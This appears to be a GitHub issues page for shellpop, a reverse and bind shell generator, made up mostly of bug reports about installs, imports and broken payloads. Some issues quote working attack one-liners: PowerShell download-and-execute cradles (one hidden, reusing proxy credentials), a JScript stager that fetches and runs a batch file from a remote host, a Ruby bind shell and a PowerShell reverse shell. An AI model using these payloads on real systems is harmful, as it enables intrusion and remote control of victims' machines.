shellpop's People

Contributors: aringo, beyarz, capnspacehook, cheriejw, nil0x42, touhidshaikh, viniciusmarangoni

shellpop's Issues

Doubts

Hello, congratulations on the tool, it is very good. I have some doubts: I used a PowerShell shell and the Metasploit framework with a handler. It appeared that I would get a meterpreter session, but the terminal simply locked without opening the meterpreter session. My doubt is whether it is possible to get the meterpreter session with shellpop. Something else I think would be interesting is to put `-w hidden` in the PowerShell codes to make it hidden after running.
Thanks.

Design Issue: setup.py should be optional

In Python and other interpreted-language projects, it is good practice to provide a setup routine as an equivalent of the traditional make install.
Therefore, the installation (here, setup.py) should always be optional, and the user should be able to run the project as soon as it has been cloned.
Most people like to test a tool before actually installing or packaging it into their system (this assertion is even more true for pentesters, who clone and test tools thousands of times per year).

ModuleNotFoundError: No module named 'bind'

After installing the requirements and running setup, I still got an error!

Traceback (most recent call last):
  File "/usr/local/bin/shellpop", line 4, in <module>
    __import__('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
  File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 765, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 1545, in run_script
    exec(code, namespace, namespace)
  File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/EGG-INFO/scripts/shellpop", line 30, in <module>
    from shellpop import *
  File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/shellpop/__init__.py", line 1, in <module>
    from bind import *
ModuleNotFoundError: No module named 'bind'
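The traceback above is the classic Python 2 to Python 3 import break: `from bind import *` inside a package's `__init__.py` is an implicit relative import, which Python 3 no longer performs, so the interpreter looks for a top-level module named `bind` and fails. The following added example is not shellpop's code; the package names `demo_bad` and `demo_good`, the `tcp()` function and the temporary directory layout are all constructed for the demonstration. It reproduces the failure and shows the explicit relative import form (`from .bind import *`) that Python 3 requires:

```python
"""Reproduce and fix the `No module named 'bind'` import error.

Python 3 removed implicit relative imports: inside a package, the line
`from bind import *` means "find a top-level module called bind", not
"find bind.py next to this __init__.py". The explicit relative form
`from .bind import *` works on both Python 2 (with absolute_import) and 3.

Added, stand-alone demonstration; the package layout below is constructed
and is not the real shellpop source tree.
"""
import importlib
import os
import sys
import tempfile


def _write(path, text):
    """Create parent directories as needed and write a small source file."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def build_demo_packages(root):
    """Create two constructed packages under `root`.

    demo_bad/__init__.py  uses the Python-2-style implicit relative import.
    demo_good/__init__.py uses the explicit relative import.
    Both contain an identical constructed bind.py submodule.
    """
    layouts = (
        ("demo_bad", "from bind import *\n"),
        ("demo_good", "from .bind import *\n"),
    )
    for name, init_line in layouts:
        _write(os.path.join(root, name, "__init__.py"), init_line)
        _write(os.path.join(root, name, "bind.py"),
               "def tcp():\n    return 'constructed bind module'\n")


def try_import(root, package_name):
    """Import `package_name` with `root` on sys.path.

    Returns (True, value of tcp()) on success or
    (False, error message) when the package's __init__ fails to import.
    """
    sys.path.insert(0, root)
    try:
        importlib.invalidate_caches()  # the files were written a moment ago
        mod = importlib.import_module(package_name)
        return True, mod.tcp()
    except ModuleNotFoundError as exc:
        return False, str(exc)
    finally:
        sys.path.remove(root)


def demonstrate():
    """Return the outcome for both layouts, keyed by import style."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_packages(root)
        implicit = try_import(root, "demo_bad")
        explicit = try_import(root, "demo_good")
    return {"implicit": implicit, "explicit": explicit}


if __name__ == "__main__":
    for style, (ok, detail) in demonstrate().items():
        status = "OK" if ok else "FAILED"
        print(f"{style} relative import -> {status}: {detail}")
```

Running the block prints one failing line for the implicit layout (the same `No module named 'bind'` message as in the issue) and one succeeding line for the explicit layout; the fix for a package in this state is to make every intra-package import explicit.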

Powershell Suggestion

Powershell reverse-shell (number 22)
cmd used
--number 22 -H localhost -P 2323 --reverse --stager http

This will not work if the system is using a proxy. Taking a cue from Metasploit web delivery, if we include

powershell.exe -nop -w hidden -c $d=new-object net.webclient;$d.proxy=[Net.WebRequest]::GetSystemWebProxy();$d.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $d.downloadstring('<URL>');

instead of the current

powershell.exe -nop -ep bypass -Command 'iex (new-object system.net.webclient).downloadString(\"http://localhost:80/sfLkhXIg\")'

Requirements.txt should include netifaces

Hi there! I'm excited to use this. Thank you so much for your contribution to the community and hard work!!

Just getting started and noticed that a module was missing from requirements.

Traceback (most recent call last):
  File "/usr/local/bin/shellpop", line 4, in <module>
    __import__('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
  File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 748, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1517, in run_script
    exec(code, namespace, namespace)
  File "/usr/local/lib/python2.7/dist-packages/shellpop-0.3.5-py2.7.egg/EGG-INFO/scripts/shellpop", line 22, in <module>
    import netifaces
ImportError: No module named netifaces

Hope this helps! Thanks again.

Hide cmd windows on remote target

Hello, how can we hide all of the cmd windows that popup when executing the below cmd.exe command?

$ shellpop --reverse --number 21 --host 192.168.1.55 --handler --base64 --powershell-random-case --stager http --http-port 2226 --port 3336
[+] Choose a stager: 
1. CertUtil Windows HTTP Stager
2. VBScript Windows HTTP Stager
[+] Stager number: 2


[+] Started HTTP server at port 2226
[+] Staged file has been named 'SkHEjSdH'
[+] Execute this code in remote target: 

cmd.exe /c "echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://192.168.1.55:2226/SkHEjSdH", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("SkHEjSdH.bat");S = new ActiveXObject("Wscript.Shell");S.run("SkHEjSdH.bat");" > SkHEjSdH.js && cmd.exe /c "cscript SkHEjSdH.js"

Bind TCP Ruby shell is broken

As I was going through all the bind shells testing for an upcoming PR, I noticed that I could not get the linux/bind/tcp/ruby shell to work. Every time I ran it I got this error from sh:

ruby -rsocket -e 'f=TCPServer.new(1337);s=f.accept;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",s,s,s)'
sh: 1: 8: Bad file descriptor

From the looks of it, I'm guessing bash doesn't like f.accept as a file descriptor, but I'm not sure how to fix that. My Ruby knowledge is very limited.

Powershell reverse shell fails on Windows 7 / Windows 10

I've run into an issue with the PowerShell reverse shell payloads 9 and 25 if generated as described below. I tested it on Windows 7 x86 and Windows 10 x64. It fails on both. I'm no PowerShell guru, so I'm not sure how to fix it.

  • shellpop -H eth0 -P 4444 --reverse --number 9
  • shellpop -H eth0 -P 4444 --reverse --number 25

This is the execution output:

powershell.exe -nop -ep bypass -Command "$xDHvvVTgtya='xx.xx.xx.xx';$GYhNfQRZIEYm=xxx;$lDUkaAa=New-Object System.Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG=$lDUkaAa.GetStream();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($kcoITwLMzujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -ne 0){$HQjgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoITwLMzujjdk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Path+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvVTgtya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($xDHvvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush();};$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();};"

And the error on Win7:

Unexpected token ')' in expression or statement.
$xDHvvVTgtya='192.168.247.129';$GYhNfQRZIEYm=4444;$lDUkaAa=New-Object System.Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG=$lDUkaAa.GetStream();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII) <<<< .GetBytes('PS '+(Get-Location).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($kcoITwLMzujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -ne 0){$HQjgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoITwLMzujjdk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Path+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvVTgtya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($xDHvvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush();};$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();};
CategoryInfo : ParserError: ():String) [], ParentContainsErrorRecordException
FullyQualifiedErrorId : UnexpectedToken

Slightly different error, maybe more helpful, in Win10:

At line:1 char:196
... KX=$XnBJSVNr.GetStream();[byte[]]$GQrahNYaUV=0..65535|:ASCII).GetByte ...
~
Unexpected token ')' in expression or statement.
CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
FullyQualifiedErrorId : UnexpectedToken

Refer to lang or another memorable name instead of a number

Just my 2 cents:
The method number is the worst part of an awesome code. If, instead of a number, the user could input something recognizable, like the language or extension (ps1 for PowerShell, php, aspx, asp, cmd, etc.), that would be more useful and quicker to remember and recall.

NameError: global name 'sys' is not defined

OS: Kali GNU/Linux Rolling
Python version: Python 2.7.15+

There seems to be a problem with the handler of reverse shell number 1.
The complete error is:

[+] Port Already used by another Program or Something Wrong... 2018 ./extras/c-ares-1.6.0/ares_gethostbyaddr.lo
Traceback (most recent call last):
  File "/usr/local/bin/shellpop", line 858, in <module>
    main()
  File "/usr/local/bin/shellpop", line 840, in main
    sys.exit()
NameError: global name 'sys' is not defined

The command I executed was:

$ shellpop --reverse --number 1 --handler --host xx.xx.xx.xx --port xxxx 

It gave me an initial shell and after executing find, I got this error and the shell closed.

I am available for any more info.
Thanks in advance

No module named pyperclip (venv install)

I've installed ShellPop in a venv, in the latest Kali. I'm using a Python 2.7.18 venv.

shellpop

After the installation of the requirements, I got an import error:

bin/shellpop --list
Traceback (most recent call last):
  File "bin/shellpop", line 18, in <module>
    import pyperclip
ImportError: No module named pyperclip

However, pyperclip is correctly installed!

Any ideas for a solution?

Thanks!

Arguments --powershell-x64 and --powershell-x86 seem to be mixed up

The --powershell-x64 and --powershell-x86 arguments seem to prefix the wrong path to the payload. In fact, I believe they are reversed.

root@home:~# shellpop -H eth0 -P 1234 --powershell-x64 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [...]

root@home:~# shellpop -H eth0 -P 1234 --powershell-x86 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [...]
